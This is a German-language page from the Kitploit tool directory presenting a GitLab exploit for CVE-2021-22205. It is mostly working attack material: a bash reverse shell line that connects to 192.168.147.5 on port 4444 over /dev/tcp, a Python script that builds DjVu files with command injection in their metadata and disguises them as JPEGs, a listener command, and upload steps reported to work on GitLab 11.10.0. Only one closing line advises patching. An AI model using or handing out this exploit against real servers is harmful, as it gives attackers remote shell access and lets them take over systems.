Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-22205-getshell — CVE-2021-22205-getshell | Kitploit
Tools/GitHubGitHub/shang159/cve-2021-22205-getshell
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubshang159/cve-2021-22205-getshell

CVE-2021-22205-getshell

CVE-2021-22205-getshell

Repository anzeigen
31vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-22205-getshell

CVE-2021-22205-getshell

Getestete Version

Erstellen der Exploit-Befehle

root@kitploit:~
echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh
chmod +x /tmp/1.sh
/bin/bash /tmp/1.sh

Generieren der Exploit-Bilder mit djvumake

root@kitploit:~
import os
payloads=[
    "echo 'bash -i >& /dev/tcp/192.168.147.5/4444 0>&1' > /tmp/1.sh",
    "chmod +x /tmp/1.sh",
    "/bin/bash /tmp/1.sh",
]
index=1000
for payload in payloads:
    rce_payload = '(metadata\n\t(Copyright "\\\n" . qx{{{0}}} . \\\n" b ") )\n'.format(payload).encode()
    with open("rce-{0}.txt".format(index), "wb") as text_file:
        text_file.write(rce_payload)
    text_file.close()
    os.system("./djvumake rce-{0}.djvu INFO=0,0 BGjp=/dev/null ANTa=rce-{1}.txt && mv rce-{2}.djvu rce-{3}.jpg".format(index,index,index,index))
    index=index+1
Tool herunterladen

Lokal Port 4444 abhören und auf die Reverse Shell warten

root@kitploit:~
nv -lv 192.168.147.5 4444

Separates Hochladen der Bilder auf gitlab

  • Hier unterscheidet sich der Ablauf von den Exploits im Internet: Viele der dort verwendeten Exploits zielen auf höhere Gitlab-Versionen ab, vermutlich Version 12 oder 13, und nutzen den Upload-Punkt unter „Neue Snippets“ mit dem Pfad: /uploads/user
  • Die von mir verifizierte Version ist 11.10.0. Die Verwendung des öffentlichen Upload-Pfads /uploads/user liefert einen 404-Fehler, und über den Upload-Pfad der Snippets /uploads/personal_snippet kann kein Befehl ausgeführt werden
  • Schließlich gelang die Befehlsausführung durch das Hochladen des Bildes über die Seite „Neues Issue“

Erfolgreich eine Reverse Shell erhalten und Zugriff auf die Zielmaschine erlangt

Nach dem separaten Hochladen der drei Bilder führt das dritte Bild den Reverse-Shell-Befehl aus und erlangt so erfolgreich Zugriff auf die Zielmaschine.

Behebungsempfehlungen

Aktualisieren Sie gitlab so schnell wie möglich auf die neueste Sicherheitsversion.